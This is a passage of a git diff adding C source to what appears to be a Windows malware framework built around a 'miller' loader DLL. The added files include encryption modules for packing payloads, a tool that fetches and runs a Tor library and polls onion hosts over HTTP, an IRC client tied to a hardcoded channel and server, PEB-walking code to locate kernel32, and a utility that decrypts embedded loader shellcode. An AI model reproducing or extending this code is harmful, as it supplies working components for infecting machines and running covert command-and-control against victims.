"O|O:parseResponse", &ctxRecvBuffer, &ctxStartMarker) || + ! ctxRecvBuffer || ! ctxStartMarker) { + PyErr_SetString(PyExc_TypeError, "Invalid arguments"); + PyErr_Print(); + return NULL; + } + + if (PyObject_GetBuffer(ctxRecvBuffer, &recvBuffer, PyBUF_SIMPLE) < 0 || + PyObject_GetBuffer(ctxStartMarker, &startMarker, PyBUF_SIMPLE) < 0) { + PyErr_SetString(PyExc_TypeError, "Argument types are not buffer objects"); + PyErr_Print(); + goto finalize; + } + if (recvBuffer.len <= 0) { + PyErr_Format(PyExc_RuntimeError, "Invalid buffer length: %u", (unsigned)recvBuffer.len); + PyErr_Print(); + goto finalize; + } + if (startMarker.len != MARKER_SIZ) { + PyErr_Format(PyExc_TypeError, "Marker size is not exactly %u bytes: %u bytes", MARKER_SIZ, (unsigned)startMarker.len); + PyErr_Print(); + goto finalize; + } + + off_t bufOff = 0; + http_resp* hResp = NULL; + while (parseResponse(recvBuffer.buf, recvBuffer.len, &hResp, &bufOff, startMarker.buf) == RSP_OK && + hResp) { + PyObject* tuple = Py_BuildValue("(s#BHIs#)", hResp->startMarker, MARKER_SIZ, + hResp->respFlags, hResp->respCode, hResp->pkgsiz, &hResp->pkgbuf[0], hResp->pkgsiz); + PyList_Append(rList, tuple); + Py_DECREF(tuple); + } + +finalize: + if (recvBuffer.buf != NULL) + PyBuffer_Release(&recvBuffer); + if (startMarker.buf != NULL) + PyBuffer_Release(&startMarker); + return rList; +} + +static PyObject* __http_addRequest(PyObject* self, PyObject* args) +{ + struct http_resp* hResp = NULL; + PyObject* ctxBuf; + PyObject* ctxResp; + Py_buffer pkgBuf = {0}, httpResp = {0}; + PyObject* retBuf = NULL; + + if (! PyArg_ParseTuple(args, "O|O:addRequest", &ctxBuf, &ctxResp) || + ! ctxBuf || ! ctxResp) { + PyErr_SetString(PyExc_TypeError, "Invalid arguments"); + return NULL; + } + + if (PyObject_GetBuffer(ctxBuf, &pkgBuf, PyBUF_SIMPLE) < 0 || + PyObject_GetBuffer(ctxResp, &httpResp, PyBUF_SIMPLE) < 0) { + PyErr_SetString(PyExc_TypeError, "Argument types are not buffer objects"); + PyErr_Print(); + goto finalize; + } + + hResp = (struct http_resp*)httpResp.buf; + if (httpResp.len != sizeof(struct http_resp) + hResp->pkgsiz) { + PyErr_Format(PyExc_RuntimeError, "Invalid http_resp size: %lu (required: %lu + %u)", httpResp.len, sizeof(struct http_resp), hResp->pkgsiz); + PyErr_Print(); + goto finalize; + } + + rrsize send_siz = pkgBuf.len; + rrbuff send_buf = COMPAT(calloc)(send_siz, sizeof(*send_buf)); + if (! send_buf) + goto finalize; + COMPAT(memcpy)(send_buf, pkgBuf.buf, send_siz); + if (addRequest(&send_buf, &send_siz, hResp) == RSP_OK) + retBuf = PyByteArray_FromStringAndSize((const char*)send_buf, send_siz); + COMPAT(free)(send_buf); +finalize: + if (pkgBuf.buf != NULL) + PyBuffer_Release(&pkgBuf); + if (httpResp.buf != NULL) + PyBuffer_Release(&httpResp); + if (retBuf) + return retBuf; + else + Py_RETURN_NONE; +} + + +/* define module methods */ +static PyMethodDef pycryptMethods[] = { + {"info", info, METH_NOARGS, "print module info"}, + {"getCodes", __http_getCodes, METH_NOARGS, "get http request/response codes"}, + {"getCodeSiz", __http_getCodeSiz, METH_NOARGS, "get code size"}, + {"getFlags", __http_getFlags, METH_NOARGS, "get http response flags"}, + {"getFlagSiz", __http_getFlagSiz, METH_NOARGS, "get flag size"}, + {"getConsts", __http_getConsts, METH_NOARGS, "get const data/macros"}, + {"parseResponse", __http_parseResponse, METH_VARARGS, "buf,startMarker -> parse http request/response"}, + {"addRequest", __http_addRequest, METH_VARARGS, "buf,struct http_resp -> add a http request to an pkgbuffer"}, + {NULL, NULL, 0, NULL} +}; + +/* module initialization */ +PyMODINIT_FUNC +initpyhttp(void) +{ + printf("ENABLED %s\n", pname); + (void) Py_InitModule(pname, pycryptMethods); +} diff --git a/source/tools/host/pycrypt.c b/source/tools/host/pycrypt.c new file mode 100644 index 0000000..ba15c7d --- /dev/null +++ b/source/tools/host/pycrypt.c @@ -0,0 +1,250 @@ +/* + * Module: pcrypt.c + * Author: Toni Uhlig <matzeton@googlemail.com> + * Purpose: Python loadable module for xor/plain buffer (en|de)cryption + */ + +#include "helper.h" /* must be the first include if compiling a python module */ + +#include <stdio.h> +#include <stdlib.h> + +#include "aes.h" +#include "crypt.h" +#include "compat.h" + + +static const char pname[] = "pycrypt"; +static bool aesInit = false; + + +static PyObject* info(PyObject* self, PyObject* args) +{ + printf("%s: (en|de)crypt xor/plain buffer\n", pname); + Py_RETURN_NONE; +} + +static int init(void) +{ + if (aesInit) + aes_cleanup(); + aes_init(); + aesInit = true; + return 0; +} + +static int __checkAESKeySize(unsigned int ksiz) +{ + if (ksiz != KEY_128 && ksiz != KEY_192 && ksiz != KEY_256) { + PyErr_Format(PyExc_TypeError, "Argument keysize must be either KEY_128(%d bytes), KEY_192(%d bytes) or KEY_256(%d bytes)", KEY_128, KEY_192, KEY_256); + return 0; + } + return 1; +} + +static int __checkCtxSize(void* buf, Py_ssize_t len) +{ + if (len < sizeof(aes_ctx_t)) { + PyErr_Format(PyExc_TypeError, "Invalid AES Context struct size: %lu < %lu", len, sizeof(aes_ctx_t)); + return 0; + } + aes_ctx_t* ctx = (aes_ctx_t*)buf; + uint32_t ks_size = 4*(ctx->rounds+1)*sizeof(uint32_t); + if (len != sizeof(aes_ctx_t)+ks_size) { + PyErr_Format(PyExc_TypeError, "Invalid AES Context rounds size: %lu < %lu", len, sizeof(aes_ctx_t)+ks_size); + return 0; + } + return 1; +} + +static PyObject* __aes_randomkey(PyObject* self, PyObject* args) +{ + unsigned int ksiz = 0; + if (! PyArg_ParseTuple(args, "I:aesRandomKey", &ksiz)) { + return NULL; + } + + if (__checkAESKeySize(ksiz) == 0) { + return NULL; + } + + unsigned char key[ksiz]; + memset(&key[0], '\0', ksiz); + aes_randomkey(&key[0], ksiz); + return PyByteArray_FromStringAndSize((const char*)&key[0], ksiz); +} + +static PyObject* __aes_allocCtx(PyObject* self, PyObject* args) +{ + PyObject* pyByteArray = NULL; + Py_buffer pyByteBuffer; + char* buf = NULL; + ssize_t len; + + if (! PyArg_ParseTuple(args, "O:aesAllocCtx", &pyByteArray)) { + PyErr_SetString(PyExc_TypeError, "Missing argument key as bytearray"); + return NULL; + } + if (PyObject_GetBuffer(pyByteArray, &pyByteBuffer, PyBUF_SIMPLE) < 0) { + PyErr_SetString(PyExc_TypeError, "Argument is not a valid Bytebuffer"); + return NULL; + } + len = pyByteBuffer.len; + if (__checkAESKeySize(len) == 0) { + return NULL; + } + + buf = pyByteBuffer.buf; + aes_ctx_t* aes_ctx = aes_alloc_ctx((unsigned char*)buf, len); + + PyObject* ctxByteArray = NULL; + if (aes_ctx) { + ssize_t size = sizeof(aes_ctx_t)+4*(aes_ctx->rounds+1)*sizeof(uint32_t); + ctxByteArray = PyByteArray_FromStringAndSize((const char*)aes_ctx, size); + } + aes_free_ctx(aes_ctx); + PyBuffer_Release(&pyByteBuffer); + return ctxByteArray; +} + +static PyObject* __aes_crypt(PyObject* self, PyObject* args) +{ + Py_buffer plainBuffer; + PyObject* plainByteArray = NULL; + char* plain = NULL; + Py_buffer ctxBuffer; + PyObject* ctxByteArray = NULL; + aes_ctx_t* aes_ctx = NULL; + PyObject* boolDoEncrypt = NULL; + bool doEncrypt = true; + + if (! PyArg_ParseTuple(args, "O|O|O:aesEncrypt", &ctxByteArray, &plainByteArray, &boolDoEncrypt) || + ! ctxByteArray || ! plainByteArray || ! boolDoEncrypt) { + PyErr_SetString(PyExc_TypeError, "Invalid arguments (signature: AES_CTX[bytearray] BUFFER[bytearray] DO_ENCRYPT[bool]"); + return NULL; + } + if (PyObject_GetBuffer(ctxByteArray, &ctxBuffer, PyBUF_SIMPLE) < 0 || + PyObject_GetBuffer(plainByteArray, &plainBuffer, PyBUF_SIMPLE) < 0 ) { + return NULL; + } + if (__checkCtxSize(ctxBuffer.buf, ctxBuffer.len) == 0) { + PyErr_SetString(PyExc_TypeError, "Invalid aes context"); + return NULL; + } + + aes_ctx = (aes_ctx_t*)ctxBuffer.buf; + doEncrypt = PyObject_IsTrue(boolDoEncrypt); + plain = plainBuffer.buf; + + uint32_t newsiz = 0; + char* new = aes_crypt_s(aes_ctx, plain, plainBuffer.len, &newsiz, doEncrypt); + PyObject* out = PyByteArray_FromStringAndSize((const char*)new, newsiz); + COMPAT(free)(new); + PyBuffer_Release(&plainBuffer); + PyBuffer_Release(&ctxBuffer); + return out; +} + +static int __check_xor32key(unsigned int ksiz) +{ + return ksiz <= 128; +} + +static uint32_t __xor32_random(void) +{ + return xor32_randomkey(); +} + +static PyObject* __xor32_randomkeyiv(PyObject* self, PyObject* args) +{ + unsigned int ksiz = 0; + if (! PyArg_ParseTuple(args, "I:xorRandomKey", &ksiz) || + __check_xor32key(ksiz) == 0) { + PyErr_SetString(PyExc_TypeError, "Invalid argument for keysize"); + return NULL; + } + + uint32_t buf[ksiz]; + memset(&buf[0], '\0', ksiz*sizeof(buf[0])); + for (unsigned int i = 0; i < ksiz; ++i) { + buf[i] = __xor32_random(); + } + return PyByteArray_FromStringAndSize((const char*)&buf[0], ksiz*sizeof(buf[0])); +} + +static PyObject* __xor32n_pcbc_crypt_buf(PyObject* self, PyObject* args) +{ + PyObject* result = NULL; + PyObject* byteBuf = NULL; + PyObject* keyBuf = NULL; + PyObject* ivBuf = NULL; + Py_buffer pyByteBuf, pyKeyBuf, pyIvBuf; + + if (! PyArg_ParseTuple(args, "O|O|O:xorCrypt", &byteBuf, &keyBuf, &ivBuf) || + ! byteBuf) { + PyErr_SetString(PyExc_TypeError, "Invalid arguments (signature: BUFFER[bytearray] XORKEY[bytearray] IV[bytearray]"); + return NULL; + } + if (PyObject_GetBuffer(byteBuf, &pyByteBuf, PyBUF_SIMPLE) < 0 || + PyObject_GetBuffer(keyBuf, &pyKeyBuf, PyBUF_SIMPLE) < 0 || + PyObject_GetBuffer(ivBuf, &pyIvBuf, PyBUF_SIMPLE) < 0) { + PyErr_SetString(PyExc_TypeError, "One or more arguments could not be exported into a Buffer View"); + goto failed; + } + + if (pyKeyBuf.len != pyIvBuf.len) { + PyErr_SetString(PyExc_TypeError, "Key and Iv length are not equal"); + goto failed; + } + if (pyKeyBuf.len % 4 != 0) { + PyErr_SetString(PyExc_TypeError, "Key and Iv length must be a multiple of 4 bytes"); + goto failed; + } + + size_t outsiz = pyByteBuf.len + sizeof(uint32_t)*pyKeyBuf.len; + uint32_t* outbuf = PyMem_Malloc(outsiz); + memset(outbuf, '\0', outsiz); + memcpy(outbuf, pyByteBuf.buf, pyByteBuf.len); + size_t newsiz = xor32n_pcbc_crypt_buf(outbuf, pyByteBuf.len, pyIvBuf.buf, pyKeyBuf.buf, pyKeyBuf.len / 4); + result = PyByteArray_FromStringAndSize((const char*)outbuf, newsiz); + PyMem_Free(outbuf); + +failed: + PyBuffer_Release(&pyByteBuf); + PyBuffer_Release(&pyKeyBuf); + PyBuffer_Release(&pyIvBuf); + return result; +} + + +/* define module methods */ +static PyMethodDef pycryptMethods[] = { + {"info", info, METH_NOARGS, "print module info"}, + {"aesRandomKey", __aes_randomkey, METH_VARARGS, "generate random aes key"}, + {"aesAllocCtx", __aes_allocCtx, METH_VARARGS, "allocate memory for a aes encryption/decryption context"}, + {"aesCrypt", __aes_crypt, METH_VARARGS, "(en|de)crypt a memory buffer"}, + {"xorRandomKeyIv", __xor32_randomkeyiv, METH_VARARGS, "generate a random xor key/iv 32-bit sequence"}, + {"xorCrypt", __xor32n_pcbc_crypt_buf, METH_VARARGS, "(en|de)crypt a memory buffer"}, + {NULL, NULL, 0, NULL} +}; + +/* module initialization */ +PyMODINIT_FUNC +initpycrypt(void) +{ + srandom(time(NULL)); + + if (init() != 0) { + printf("%s: Error while initializing module\n", pname); + } else { + printf("ENABLED %s\n", pname); + PyObject* m = Py_InitModule(pname, pycryptMethods); + if (m) { + if (PyModule_AddIntMacro(m, KEY_128) != 0 || + PyModule_AddIntMacro(m, KEY_192) != 0 || + PyModule_AddIntMacro(m, KEY_256) != 0) { + printf("Failed to add some Macro's ..\n"); + } + } + } +} diff --git a/source/tools/host/pyloader.c b/source/tools/host/pyloader.c new file mode 100644 index 0000000..4d0a487 --- /dev/null +++ b/source/tools/host/pyloader.c @@ -0,0 +1,114 @@ +/* + * Module: pyloader.c + * Author: Toni Uhlig <matzeton@googlemail.com> + * Purpose: Python loadable module for loader modifications + */ + +#include "helper.h" /* must be the first include if compiling a python module */ + +#include <stdio.h> +#include <stdlib.h> + +#include "loader.h" + + +static const char pname[] = "pyloader"; +static const size_t ldr_strivkeylen = LOADER_STR_IVKEYLEN; +static const size_t ldr_ivkeylen = LOADER_IVKEYLEN; +static const char endmarker[] = { _LOADER_ENDMARKER }; +static struct loader_x86_data loader86; + + +static PyObject* info(PyObject* self, PyObject* args) +{ + char* ldr_bufstr = bintostr((char*)&endmarker[0], sizeof(endmarker)/sizeof(endmarker[0]), 0, NULL); + printf("%s: get miller loader data from python scripts\n" + "\tLOADER_STR_IVKEYLEN: %lu\n" + "\tLOADER_IVKEYLEN....: %lu\n" + , pname, ldr_strivkeylen, ldr_ivkeylen); + printf( "\tENDMARKER..........: %s\n", ldr_bufstr); + free(ldr_bufstr); + Py_RETURN_NONE; +} + +static PyObject* getLdrStrLen(PyObject* self, PyObject* args) +{ + return Py_BuildValue("(II)", + sizeof(loader86.strVirtualAlloc)/sizeof(loader86.strVirtualAlloc[0]), + sizeof(loader86.strIsBadReadPtr)/sizeof(loader86.strIsBadReadPtr[0])); +} + +static PyObject* getLdrStrIvKeyLen(PyObject* self, PyObject* args) +{ + return Py_BuildValue("I", ldr_strivkeylen); +} + +static PyObject* getLdrIvKeySiz(PyObject* self, PyObject* args) +{ + return Py_BuildValue("I", sizeof(loader86.key[0])); +} + +static PyObject* getLdrIvKeyLen(PyObject* self, PyObject* args) +{ + return Py_BuildValue("I", ldr_ivkeylen); +} + +static PyObject* getLdrStructSize(PyObject* self, PyObject* args) +{ + return Py_BuildValue("n", sizeof(loader86)); +} + +static PyObject* getLdrEndmarker(PyObject* self, PyObject* args) +{ + return Py_BuildValue("s#", &endmarker[0], sizeof(endmarker)/sizeof(endmarker[0])); +} + +static PyObject* getLdrEndmarkerSize(PyObject* self, PyObject* args) +{ + return Py_BuildValue("n", sizeof(endmarker)/sizeof(endmarker[0])); +} + +#define CALC_OFFSET(elem) ( (off_t)&(loader86.elem) - (off_t)&loader86 ) +#define PYDICT_STRUCT_OFFSET(elem) { PyObject* pyval = Py_BuildValue("n", CALC_OFFSET(elem)); if (pyval) { PyDict_SetItemString( dict, #elem, pyval ); Py_DECREF(pyval); } } +static PyObject* getLdrStructOffsetDict(PyObject* self, PyObject* args) +{ + PyObject* dict = PyDict_New(); + PYDICT_STRUCT_OFFSET(strVirtualAlloc[0]); + PYDICT_STRUCT_OFFSET(strIsBadReadPtr[0]); + PYDICT_STRUCT_OFFSET(iv[0]); + PYDICT_STRUCT_OFFSET(key[0]); + PYDICT_STRUCT_OFFSET(flags); + PYDICT_STRUCT_OFFSET(ptrToDLL); + PYDICT_STRUCT_OFFSET(sizOfDLL); + PYDICT_STRUCT_OFFSET(endMarker); + PyDict_SetItemString(dict, "ldrStrLen", getLdrStrLen(self, args)); + PyDict_SetItemString(dict, "ldrStrIvKeyLen", getLdrStrIvKeyLen(self, args)); + PyDict_SetItemString(dict, "ldrIvKeySiz", getLdrIvKeySiz(self, args)); + PyDict_SetItemString(dict, "ldrIvKeyLen", getLdrIvKeyLen(self, args)); + PyDict_SetItemString(dict, "structSize", getLdrStructSize(self, args)); + PyDict_SetItemString(dict, "endMarkerSize", getLdrEndmarkerSize(self, args)); + return dict; +} + +/* define module functions */ +static PyMethodDef pyloaderMethods[] = { + {"info", info, METH_NOARGS, "module info"}, + {"getLdrStrLen", getLdrStrLen, METH_NOARGS, "get loader strings length"}, + {"getLdrStrIvKeyLen", getLdrStrIvKeyLen, METH_NOARGS, "get loader string iv/key len"}, + {"getLdrIvKeySiz", getLdrIvKeySiz, METH_NOARGS, "get loader iv/key element size"}, + {"getLdrIvKeyLen", getLdrIvKeyLen, METH_NOARGS, "get loader iv/key len"}, + {"getStructSize", getLdrStructSize, METH_NOARGS, "get struct loader_x86_data size"}, + {"getEndmarker", getLdrEndmarker, METH_NOARGS, "get loader endmarker buffer"}, + {"getEndmarkerSize", getLdrEndmarkerSize, METH_NOARGS, "get loader endmarker bufsiz"}, + {"getStructOffset", getLdrStructOffsetDict, METH_NOARGS, "get loader struct offset dict"}, + {NULL, NULL, 0, NULL} /* Sentinel */ +}; + +/* module initialization */ +PyMODINIT_FUNC +initpyloader(void) +{ + memset(&loader86, '\0', sizeof(loader86)); + printf("ENABLED %s\n", pname); + (void) Py_InitModule(pname, pyloaderMethods); +} diff --git a/source/tools/httpquery.c b/source/tools/httpquery.c new file mode 100644 index 0000000..a753be6 --- /dev/null +++ b/source/tools/httpquery.c @@ -0,0 +1,162 @@ +#include "compat.h" + +#include <stdio.h> +#include <stdlib.h> +#include <stdbool.h> +#include <unistd.h> +#include <libgen.h> + +#include "crypt.h" +#include "crypt_strings.h" +#include "http.h" + + +typedef struct opts { + bool dl_libtor:1; + bool on_doloop:1; + char* on_host; + char* on_res; + char* on_meth; +} opts_t; + +static void usage(char* arg0) +{ + printf("usage: %s [-h] [-l] [-d HOST] [-r RESOURCE] [-m METHOD]\r\n" + "\t-h\tthis\r\n" + "\t-l\tdownload/run libtor\r\n" + "\t-p\tenter dll http loop\r\n" + "\t-d\tdestination onion host\r\n" + "\t\t\te.g. something.onion\r\n" + "\t-r\thttp resource\r\n" + "\t\t\te.g. /uri?paramN=valueN\r\n" + "\t-m\thttp method\r\n" + "\t\t\te.g. GET\r\n" + "\r\n", arg0); +} + +static void parse_opts(int argc, char** argv, opts_t* po) +{ + int opt; + + if (!po) return; + while ((opt = getopt(argc, argv, "hlpd:r:m:")) != -1) { + switch (opt) { + case 'h': + usage(argv[0]); + exit(1); + case 'l': + po->dl_libtor = true; + break; + case 'p': + po->on_doloop = true; + break; + case 'd': + po->on_host = strdup(optarg); + break; + case 'r': + po->on_res = strdup(optarg); + break; + case 'm': + po->on_meth = strdup(optarg); + break; + default: + printf("Unknown option: %d\r\n", opt); + break; + } + } +} + +int main(int argc, char** argv) +{ + opts_t o; + const char* arg0 = "httpquery"; + void* loadlib = LoadLibraryA; + void* getproc = GetProcAddress; + + if (!bInitCompat(LoadLibraryA("KERNEL32.dll"), getproc)) + return -1; + + memset(&o, 0, sizeof(o)); + parse_opts(argc, argv, &o); + + COMPAT(printf)("LoadLibraryA.....: 0x%p\r\n", loadlib); + COMPAT(printf)("GetProcAddress...: 0x%p\r\n", getproc); + + if (initHttp(loadlib, getproc) != 0) { + COMPAT(printf)("%s: initHttp(...) failed\r\n", arg0); + return 1; + } + + /* download libtor and save it to %TEMP%\libonion.dll */ + if (o.dl_libtor) { + COMPAT(printf)("%s: download libtor\r\n", arg0); + int ret; + char* libPath = NULL; + if ((ret = downloadLibtor(&libPath)) != ERR_HTTP_OK) { + COMPAT(printf)("%s: libtor download failed with %d (GetLastError: %u/0x%X)\r\n", arg0, ret, (unsigned)GetLastError(), (unsigned)GetLastError()); + } else { + COMPAT(printf)("%s: libtor: %s\r\n", arg0, libPath); + HMODULE libmod = NULL; + tor_main_t tm = loadLibtor(libPath, &libmod, LoadLibraryA, GetProcAddress); + COMPAT(printf)("%s: libmod: %p, tormain: %p\r\n", arg0, libmod, tm); + /* run tor main loop */ + tm(59050, 0xdeadc0de); + } + if (libPath) + COMPAT(free)(libPath); + } + + struct http_args hArgs = {0}; + +#ifdef _HTTP_LOCALHOST + DBUF(HTTP_HOST_LOCAL_ENUM, __hosts); + char __onion[1] = {0}; +#else + DBUF(HTTP_HOSTS_ENUM, __hosts); + DBUF(HTTP_ONION_ENUM, __onion); +#endif + + char* cur = NULL; + char* end = NULL; + get_string_in_strings_di(__hosts, 0, &cur, &end); + + size_t hostLen = strlen(__onion) + strlen(cur); + char host[hostLen+1]; + snprintf(&host[0], hostLen+1, cur, __onion); + + hArgs.host = (o.on_host != NULL ? o.on_host : host); + hArgs.hostLen = strlen(hArgs.host); + hArgs.resource = (o.on_res != NULL ? o.on_res : "/"); + hArgs.resourceLen = strlen(hArgs.resource); + hArgs.method = (o.on_meth != NULL ? o.on_res : "GET"); + hArgs.methodLen = strlen(hArgs.method); + + rrbuff out = NULL; + rrsize outSiz = 0; + DWORD status = 0; + int ret = sendHttpRequest(&hArgs, &out, &outSiz, &status); + switch (ret) { + case 0: + COMPAT(printf)("Success: %u\r\n", (unsigned)status); + break; + default: + COMPAT(printf)("Error: %d (GetLastError: %u/0x%X)\r\n", ret, (unsigned)GetLastError(), (unsigned)GetLastError()); + break; + } + + if (out && outSiz > 0) + COMPAT(printf)("Website content (Status %d, Size: %u):\n%s\r\n", (int)status, (unsigned)outSiz, out); + + if (o.on_doloop) { + printf("Enter HTTP Loop ..\n"); + while (1) { + httpLoopAtLeastOnce(); + sleep(20); + } + } + + if (o.on_host) free(o.on_host); + if (o.on_meth) free(o.on_meth); + if (o.on_res) free(o.on_res); + return ret; +} diff --git a/source/tools/ircmsg.c b/source/tools/ircmsg.c new file mode 100644 index 0000000..fa01bbc --- /dev/null +++ b/source/tools/ircmsg.c @@ -0,0 +1,37 @@ +#include "compat.h" +#include "irc.h" + + +int main(int argc, char** argv) +{ + void* loadlib = LoadLibraryA; + void* getproc = GetProcAddress; + + (void) argc; + if (!bInitCompat(LoadLibraryA("KERNEL32.dll"), getproc)) + return -1; + + COMPAT(printf)("LoadLibraryA.....: 0x%p\n", loadlib); + COMPAT(printf)("GetProcAddress...: 0x%p\n", getproc); + COMPAT(printf)("WSAStartup.......: 0x%p\n", WSAStartup); + + int ret; + if ((ret = initSocket(loadlib, getproc)) != 0) { + COMPAT(printf)("%s: initSocket(...) failed with: %d\n", argv[0], ret); + return 1; + } + + if ((ret = ircLoop("muzzling", "#blkhtm", "dreamhack.se.quakenet.org", "6667")) != 0) { + COMPAT(printf)("%s: ircLoop() returned: %d\n", argv[0], ret); + } + switch (ret) { + case WSAHOST_NOT_FOUND: + COMPAT(printf)("%s: Host not found.\n", argv[0]); + break; + case WSAETIMEDOUT: + COMPAT(printf)("%s: Connection timed out.\n", argv[0]); + break; + } + + return 0; +} diff --git a/source/tools/libtor.c b/source/tools/libtor.c new file mode 100644 index 0000000..903ac82 --- /dev/null +++ b/source/tools/libtor.c @@ -0,0 +1,52 @@ +#include <stdio.h> +#include <stdlib.h> + +#include <windows.h> + +#include "http.h" + + +const char tm_proc[] = "tor_main@8"; +const unsigned int default_port = 59050; +const unsigned int ident = 0xdeadc0de; + +int main(int argc, char** argv) +{ + unsigned int pport = default_port; + + if (argc < 2) { + fprintf(stderr, "usage: %s [Path-To-LibTor.dll] [Proxy-Port]\n", argv[0]); + exit(1); + } + if (argc >= 3) { + pport = atoi(argv[2]); + if (pport == 0) + pport = default_port; + } + + SetLastError(0); + HMODULE hLibTor = LoadLibraryA(argv[1]); + tor_main_t tor_main = NULL; + if (hLibTor) { + tor_main = (tor_main_t) GetProcAddress(hLibTor, tm_proc); + } + + printf("libtor..: 0x%p\n" + "tor_main: 0x%p\n" + "error...: %lu\n" + , hLibTor, tor_main, GetLastError()); + + if (tor_main) { + printf("\nCalling %s(%u, 0x%p) ..\n", tm_proc, pport, (void*)ident); + int ret = tor_main(pport, ident); + if (ret == 0) { + printf("%s succeeded\n", tm_proc); + } else { + printf("%s returned: %d\n", tm_proc, ret); + } + exit(ret); + } else { + fprintf(stderr, "Did not find \"%s\" int %s\n", tm_proc, argv[1]); + exit(1); + } +} diff --git a/source/tools/loader_base.c b/source/tools/loader_base.c new file mode 100644 index 0000000..7ce73cb --- /dev/null +++ b/source/tools/loader_base.c @@ -0,0 +1,102 @@ +#include <windows.h> + +#include <stdio.h> +#include <stdlib.h> +#include <unistd.h> + + +/* see source/loader_x86.asm */ +int loader_start() __asm__("__ldr_start"); + + +#pragma GCC diagnostic ignored "-Wreturn-type" +extern int getKernelBase(void) __asm__("getKernelBase"); + +static int __attribute__ ((unused)) +__dummy_getKernelBase() +{ + __asm__ __volatile__( + ".intel_syntax noprefix\n" + ".global getKernelBase\n" + "getKernelBase:\n" + "nop; nop; nop\n\t" + "mov eax,[fs:0x30]\n\t" + "mov eax,[eax+0x0c]\n\t" + "mov eax,[eax+0x14]\n\t" + "mov eax,[eax]; mov eax,[eax]\n\t" + "mov eax,[eax+0x10]\n\t" + "ret\n\t" + "nop; nop; nop\n\t" + ".att_syntax\n" + ); +} +#pragma GCC diagnostic warning "-Wreturn-type" /* disable "non void function doesnt return anything"-error */ + +extern FARPROC myGetProcAddress(HMODULE hModule, LPCSTR lpProcName) { + return GetProcAddress(hModule, lpProcName); +} + +extern HMODULE WINAPI myGetModuleHandle(LPCTSTR lpModuleName) { + return GetModuleHandle(lpModuleName); +} + +int main(int argc, char** argv) +{ + DWORD dwWait = 2; + + if (argc > 1 && argc != 2) { + printf("usage: %s [WAIT_TIME]\n", argv[0]); + abort(); + } else if (argc == 2) { + errno = 0; + dwWait = strtoul(argv[1], NULL, 10); + if (errno != 0) + dwWait = 2; + } else if (argc == 1) { + printf("You can set my termination time with `%s [WAIT_TIME]`\n\n", argv[0]); + } + + printf("getKernelBase....: 0x%p\n", (char*)getKernelBase()); + + __asm__ __volatile__( + "nop; nop; nop; nop; nop;" + ); + HMODULE k32 = myGetModuleHandle("kernel32.dll"); + __asm__ __volatile__( + "nop; nop; nop; nop; nop;" + ); + printf("Kernel32.dll.....: 0x%p\n", k32); + __asm__ __volatile__( + "nop; nop; nop; nop; nop;" + ); + printf("GetProcAddr......: 0x%p\n", GetProcAddress); + printf("VirtualAlloc.....: 0x%p\n", myGetProcAddress(k32, "VirtualAlloc")); + printf("IsBadReadPtr.....: 0x%p\n", myGetProcAddress(k32, "IsBadReadPtr")); + + __asm__ __volatile__( + "nop; nop; nop; nop; nop;" + ); + +#ifdef _MILLER_IMAGEBASE + /* force relocation */ + LPVOID vpointer = VirtualAlloc((LPVOID)_MILLER_IMAGEBASE, 0x1000, MEM_RESERVE, PAGE_READWRITE); + if (!vpointer) { + printf("VirtualAlloc,,,..: %ld\n", GetLastError()); + } else { + printf("Ptr-alloc'd......: 0x%p\n", vpointer); + } +#else + printf("WARNING..........: Ptr-alloc disabled ( missing macro `-D_MILLER_IMAGEBASE=[HEX-VALUE]` )\n"); +#endif + + /* loader test */ + printf("Loader...........: 0x%p\n", loader_start); + printf("------------ EoL ------------\n"); + int retval = loader_start(); + sleep(dwWait); + printf("-----------------------------\n"); + printf("Loader init......: 0x%p (%d)\n", (void*)retval, retval); + printf("error............: 0x%p (%ld)\n", (void*)GetLastError(), GetLastError()); + + return retval; +} diff --git a/source/tools/loader_decrypt.c b/source/tools/loader_decrypt.c new file mode 100644 index 0000000..0043e7a --- /dev/null +++ b/source/tools/loader_decrypt.c @@ -0,0 +1,58 @@ +#include "compat.h" + +#include <stdio.h> +#include <stdlib.h> +#include <stdbool.h> + +#include "utils.h" +#include "helper.h" +#include "aes.h" +#include "xor_strings.h" +#include "aes_strings_gen.h" +#include "loader_x86_crypt.h" + + +_AESDATA_(ldrdata, LOADER_SHELLCODE); +_AESSIZE_(ldrsiz, ldrdata); +static const size_t real_ldrsiz = LOADER_SHELLCODE_SIZE; + +_AESDATA_(ldrdbgdata, LOADER_SHELLCODE_DEBUG); +_AESSIZE_(ldrdbgsiz, ldrdbgdata); +static const size_t real_ldrdbgsiz = LOADER_SHELLCODE_DEBUG_SIZE; + + +int main(int argc, char** argv) +{ + (void)argc; + aes_init(); + + size_t pSiz = 0; + aes_ctx_t* ctx = aes_alloc_ctx((unsigned char*)LDR_KEY, LDR_KEYSIZ); + + BYTE* ldr = (BYTE*)aes_crypt_s(ctx, (char*)ldrdata, (size_t)ldrsiz, &pSiz, false); + + char* hexout = bintostr((char*)ldr, real_ldrsiz, 1, NULL); + printf("%s [DECRYPTED]: %u bytes\n%s\n", argv[0], real_ldrsiz, hexout); + + free(ldr); + free(hexout); + + hexout = bintostr((char*)ldrdata, ldrsiz, 1, NULL); + printf("%s [ENCRYPTED]: %u bytes\n%s\n", argv[0], ldrsiz, hexout); + free(hexout); + + ldr = (BYTE*)aes_crypt_s(ctx, (char*)ldrdbgdata, (size_t)ldrdbgsiz, &pSiz, false); + + hexout = bintostr((char*)ldr, real_ldrdbgsiz, 1, NULL); + printf("%s [DECRYPTED]: %u bytes\n%s\n", argv[0], real_ldrdbgsiz, hexout); + + free(ldr); + free(hexout); + + hexout = bintostr((char*)ldrdata, ldrdbgsiz, 1, NULL); + printf("%s [ENCRYPTED]: %u bytes\n%s\n", argv[0], ldrdbgsiz, hexout); + free(hexout); + + aes_free_ctx(ctx); + return 0; +} diff --git a/source/tools/loadmodule.c b/source/tools/loadmodule.c new file mode 100644 index 0000000..48bc8be --- /dev/null +++ b/source/tools/loadmodule.c @@ -0,0 +1,57 @@ +#include <stdio.h> +#include <stdlib.h> +#include <libgen.h> +#include <windows.h> + + +const char dllpath[] = "libw32miller_pre-shared.dll"; + + +int main(int argc, char** argv) { + char* path = NULL; + BOOL hasPathToDLL = FALSE; + + if (argc == 2) { + path = argv[1]; + hasPathToDLL = TRUE; + } else if (argc == 1) { + path = dirname(argv[0]); + } else { + printf("usage: %s [|PATH_TO_DLL]\n", path); + return 1; + } + +#ifdef _MILLER_IMAGEBASE + /* force windows loader to relocate module */ + LPVOID vpointer = VirtualAlloc((LPVOID)_MILLER_IMAGEBASE, 0x1000, 